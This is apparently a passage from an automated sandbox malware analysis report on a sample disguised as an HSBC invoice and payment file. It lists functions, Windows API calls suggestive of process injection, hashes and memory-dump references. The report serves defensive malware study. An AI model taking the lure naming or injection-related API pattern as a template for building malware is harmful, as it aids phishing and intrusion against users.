                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                    • String ID:
                    • API String ID: 2800547568-0
                    • Opcode ID: d5157b05a61ade13c435fa7f9ccb0d2a96cdb5d5913e8b073499c34190aeb8cd
                    • Instruction ID: 6c25dc46157aeea192dca70064de6668140616aa793eb553487a5491a51ab205
                    • Opcode Fuzzy Hash: d5157b05a61ade13c435fa7f9ccb0d2a96cdb5d5913e8b073499c34190aeb8cd
                    • Instruction Fuzzy Hash: 08F0B472900B05DAD720AF75890276E77E16F8B334F55A249E414BF1C1CF7CAA019B55
                    Function 00E2129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                    Download Yara Rule
                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00E21A5B
                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E21AF1
                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E21B13
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272013729.0000000000E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e20000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                    • String ID:
                    • API String ID: 2438371351-0
                    • Opcode ID: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
                    • Instruction ID: 6a9808e53fee40a26dafe65c72203db3d5ef6030e637dee02c4e2ccd4a8465c0
                    • Opcode Fuzzy Hash: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
                    • Instruction Fuzzy Hash: 9612BD24E14658C6EB24DF64D8507DEB232EF68300F10A1E9910DEB7A5E77A4F81CF5A
                    Function 00E8F3F0 Relevance: 1.7, APIs: 1, Instructions: 185COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8c0a24dc00a360efadce475ced011a5fdd26f435a04f9cc41e100917a97de796
                    • Instruction ID: ccd1d2b6c1022535595c40f97251f46fc4f5b6156f258d38653705174a789518
                    • Opcode Fuzzy Hash: 8c0a24dc00a360efadce475ced011a5fdd26f435a04f9cc41e100917a97de796
                    • Instruction Fuzzy Hash: 1061BDB060020A9FDB14EF64C990ABBB7E5EF09304F14907EE91EAB291E771ED51CB51
                    Function 00E92123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4c0ab8f97c92aa3f964636a637666ea25d038c43cfb407a6f233b2b608b77b8d
                    • Instruction ID: c66df4af30e1874c1af98a55ec6acb927408d615882d9ce5a3b72596902453a3
                    • Opcode Fuzzy Hash: 4c0ab8f97c92aa3f964636a637666ea25d038c43cfb407a6f233b2b608b77b8d
                    • Instruction Fuzzy Hash: 4F517B35600604AFCF14EB64C991FAE77E6AF85314F14A0A8F94ABB392DA31ED01DB51
                    Function 00E85C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                    Download Yara Rule
                    APIs
                    • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00E85CF6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: FilePointer
                    • String ID:
                    • API String ID: 973152223-0
                    • Opcode ID: dfd1a9400f527a969ce21b745d1d9b5de87bf3080dde8f7d3e691b3decf1fc67
                    • Instruction ID: 47b01e962aeb5c85cd0960c3b03f12fc90b9c4f9e0b137890a598158d34f9032
                    • Opcode Fuzzy Hash: dfd1a9400f527a969ce21b745d1d9b5de87bf3080dde8f7d3e691b3decf1fc67
                    • Instruction Fuzzy Hash: BB313C72A00B09AFCB18EF6DC48469DF7B5FF48314F249629D81DA3750DB71A950DB90
                    Function 00EC00D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID:
                    • API String ID: 1473721057-0
                    • Opcode ID: 657322b3cec5667fd58e1e7fb804b237e5ec6b849b5d9eeb111d159ee89a475d
                    • Instruction ID: 518853a9a209b56c79e05f1673946c1e27f8557d64a51414f4565d93e9abd310
                    • Opcode Fuzzy Hash: 657322b3cec5667fd58e1e7fb804b237e5ec6b849b5d9eeb111d159ee89a475d
                    • Instruction Fuzzy Hash: AA413874504341CFDB24DF14C484B1ABBE0BF45318F0998ACE899AB762C372EC86CB52
                    Function 00E8C707 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _wcscmp
                    • String ID:
                    • API String ID: 856254489-0
                    • Opcode ID: b0a1573d9e904727a44b003dec019e751cbbe07f43c444354ee7f3724b703744
                    • Instruction ID: dea4aab289c9203fd905de87cc984af0f4dc7d579d7e04c6a55fdbe5e09254ca
                    • Opcode Fuzzy Hash: b0a1573d9e904727a44b003dec019e751cbbe07f43c444354ee7f3724b703744
                    • Instruction Fuzzy Hash: 5711C0329041189BCB14BBA9DC81DEEF7B8EF56360F20515AF81CB7190EB319D46CBA0
                    Function 00E880D7 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: 46acc021f7701719685bd31058d1bf319928b5265fe0d6ec76a5632e42df60c5
                    • Instruction ID: 4b5b7575ac2581f101c7a13d2007d19cab5c35bada2e754858a09c34ac1beb56
                    • Opcode Fuzzy Hash: 46acc021f7701719685bd31058d1bf319928b5265fe0d6ec76a5632e42df60c5
                    • Instruction Fuzzy Hash: 82118B7A201601DFC724DF28D581A16B7E9FF49354B60D86EE88EDB361DB32E842CB40
                    Function 00E84F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E84D13: FreeLibrary.KERNEL32(00000000,?), ref: 00E84D4D
                      • Part of subcall function 00EA548B: __wfsopen.LIBCMT ref: 00EA5496
                    • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00F462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E84F6F
                      • Part of subcall function 00E84CC8: FreeLibrary.KERNEL32(00000000), ref: 00E84D02
                      • Part of subcall function 00E84DD0: _memmove.LIBCMT ref: 00E84E1A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Library$Free$Load__wfsopen_memmove
                    • String ID:
                    • API String ID: 1396898556-0
                    • Opcode ID: 590508a0814f5be5d46bd5fbda0d638d27071b72629f289a2068b04480abaaf4
                    • Instruction ID: 70b6a1bcd8fd7d3b7791563f3bca790b68ba92cb43ed0e4aa2673f6ff37a63f7
                    • Opcode Fuzzy Hash: 590508a0814f5be5d46bd5fbda0d638d27071b72629f289a2068b04480abaaf4
                    • Instruction Fuzzy Hash: 9611B27264030AAACB20FF60CC12FAEB7E9DB44704F14942DF549B61C1DA759A059B50
                    Function 00EC01AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID:
                    • API String ID: 1473721057-0
                    • Opcode ID: 1c4d38d313e2ca41500a65a600f2f4449a8ecee0aca3ad5f4c40275bd18b34a9
                    • Instruction ID: 048b076df92a3b5ad14ee90a6c7f66295dad727c776beccb35babed2b85be1a2
                    • Opcode Fuzzy Hash: 1c4d38d313e2ca41500a65a600f2f4449a8ecee0aca3ad5f4c40275bd18b34a9
                    • Instruction Fuzzy Hash: 682146B4508341CFDB24EF14C484B1ABBE0BF88304F0999ACE89A67762D731F845DB52
                    Function 00E85D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                    Download Yara Rule
                    APIs
                    • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00E85807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00E85D76
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: 97eaacaff9337052192069baa0e41629059859885b3ce1488af980df23d11ff8
                    • Instruction ID: 54e75e0710933ba15bdc431afbcf6a42c3bae9ca6b71ebe06a2854f901b30de1
                    • Opcode Fuzzy Hash: 97eaacaff9337052192069baa0e41629059859885b3ce1488af980df23d11ff8
                    • Instruction Fuzzy Hash: 53112832200B059FD3309F15C884B67B7E5EB45754F10892EE8AE96A90DBB1E945CB60
                    Function 00E8C6DA Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _wcscmp
                    • String ID:
                    • API String ID: 856254489-0
                    • Opcode ID: 489dbd31b2a9142572e60e6fdbdf234b307930cbd0560bf58f528beb592acb15
                    • Instruction ID: 2fe9d4daf29e871ef9f3c58fe523e8096e2a56fb942ee5e7fbd8a6531d859967
                    • Opcode Fuzzy Hash: 489dbd31b2a9142572e60e6fdbdf234b307930cbd0560bf58f528beb592acb15
                    • Instruction Fuzzy Hash: F001E1729082855FDB11AB7988506ADFFB09F57330F25829BE468BB1E2D2318C86CB51
                    Function 00EA4A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                    Download Yara Rule
                    APIs
                    • __lock_file.LIBCMT ref: 00EA4AD6
                      • Part of subcall function 00EA8D68: __getptd_noexit.LIBCMT ref: 00EA8D68
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: __getptd_noexit__lock_file
                    • String ID:
                    • API String ID: 2597487223-0
                    • Opcode ID: ccbd6f59fc0d41c16d15f2edbbec8d74f6a6e1fd7e1d8340aa88eb6ce018fcda
                    • Instruction ID: 2d719e5b373eb97d48502f08493129d1f9fc1107b3a924c1a012897f9022078b
                    • Opcode Fuzzy Hash: ccbd6f59fc0d41c16d15f2edbbec8d74f6a6e1fd7e1d8340aa88eb6ce018fcda
                    • Instruction Fuzzy Hash: 2BF0F4719002099BDF61AFA48C067DF3AE0AF8A329F049114B414BE0D1DBB8AA20DF51
                    Function 00E84FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                    Download Yara Rule
                    APIs
                    • FreeLibrary.KERNEL32(?,?,00F462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E84FDE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: 6e548bd54d41f3f2ba56e4fa86e822e6f9eba4b9385b7db2fb898b687ca56732
                    • Instruction ID: 33c18f25d9643112011aebebdb7400740d93d19b08a671557feb4aa7d044930f
                    • Opcode Fuzzy Hash: 6e548bd54d41f3f2ba56e4fa86e822e6f9eba4b9385b7db2fb898b687ca56732
                    • Instruction Fuzzy Hash: 6DF030B1605712CFCB34AF64D494852BBE1FF15329320AA3EE6DE92650C731A844DF40
                    Function 00EA09D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                    Download Yara Rule
                    APIs
                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00EA09F4
                      • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: LongNamePath_memmove
                    • String ID:
                    • API String ID: 2514874351-0
                    • Opcode ID: 9c69435bc7a54f2644030b3bcb0cdde8d0bfdaefb365b0df607371a450662413
                    • Instruction ID: 77dae36622688674620f11678edcc728b209027a0cd8744cce172a119bd69cfc
                    • Opcode Fuzzy Hash: 9c69435bc7a54f2644030b3bcb0cdde8d0bfdaefb365b0df607371a450662413
                    • Instruction Fuzzy Hash: FFE0CD3690422C5BC720E6589C05FFA77EDDF897A0F0501F5FC4CD7245D960AC818690
                    Function 00EE9129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: __fread_nolock
                    • String ID:
                    • API String ID: 2638373210-0
                    • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                    • Instruction ID: 1e6af42643a9e86f3490ec0b5873547e5be0e7cd4390ed27a99972dc4c0aab7d
                    • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                    • Instruction Fuzzy Hash: FBE092B1104B845FD7388A24D8107E373E0BB06319F01081CF29A93342EB6278418759
                    Function 00E85DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                    Download Yara Rule
                    APIs
                    • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00EBE16B,?,?,00000000), ref: 00E85DBF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: FilePointer
                    • String ID:
                    • API String ID: 973152223-0
                    • Opcode ID: 28bd1f093fb67a02df142781a04db85bdf4ca9156912f0207b1c75bd306d0aec
                    • Instruction ID: b0eadd5450f1e495f4c0b87eaf83abe19a0fcadff1a673b8d4b2590ed27be433
                    • Opcode Fuzzy Hash: 28bd1f093fb67a02df142781a04db85bdf4ca9156912f0207b1c75bd306d0aec
                    • Instruction Fuzzy Hash: 78D0C77464020CBFE710DB80DC46FA9777CE705710F100194FD0456690D6B27D549795
                    Function 00EA548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
